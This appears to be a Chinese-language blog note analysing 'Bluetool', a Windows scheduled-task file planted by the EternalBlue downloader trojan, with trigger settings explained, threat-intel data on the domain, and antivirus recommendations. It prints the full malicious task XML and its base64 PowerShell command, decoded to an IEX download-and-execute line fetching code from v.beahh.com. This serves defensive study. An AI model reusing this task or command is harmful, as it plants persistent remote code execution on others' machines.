黑客笔记04：永恒之蓝下载器木马配置文件Bluetool简析

Bluetool病毒文件

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2023-02-23T20:13:04</Date>
    <Author>SYSTEM</Author>
  </RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition>
        <Interval>PT50M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <StartBoundary>2023-02-23T07:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>powershell</Command>
      <Arguments>-ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=</Arguments>
    </Exec>
  </Actions>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
</Task>

Bluetool病毒文件用于提供永恒之蓝病毒的更新，在Windows上创建计划任务，定期执行。

System用户在2023年02月23日20点13分04秒创建Bluetool文件。

每50分钟执行一次，未设置结束条件，按照2023年02月23日早上7点起设定的时间间隔执行计划任务。

如果检测到计算机使用电池供电，不启动计划任务，且一旦检测到计算机使用电池供电，立即中止计划任务。

定期执行的powershell命令：

powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=

使用base64解码：

IEX (New-Object Net.WebClient).downloadstring('http://v.beahh.com/v'+$env:USERDOMAIN)

菜鸟教程base64解码工具：

c.runoob.com/front-end/6…

v.beahh.com域名是永恒之蓝下载器的标志性特征。

微步判定v.beahh.com为恶意域名。它存在远控行为，并与驱动人生后门有关。根据微步情报局掌握的信息，域名在2019年01月16日注册，在2025年01月16日过期，服务商为NAMECHEAP INC。有58个样本与该域名有通信行为，关联样本主要涉及Mimikatz,PSRunner,MalGeneric恶意样本家族，恶意类型为木马。

个人Windows反病毒软件推荐火绒安全软件，亲测发现腾讯电脑管家和360杀毒部分情况下查杀不彻底。

www.huorong.cn/person5.htm…

个人Windows应用商店推荐火绒应用商店

www.huorong.cn/app_store.h…

中小企业反病毒软件推荐腾讯电脑管家团队版，可以实现统一杀毒，统一打补丁，统一管理软件。

team.qq.com/site/index.…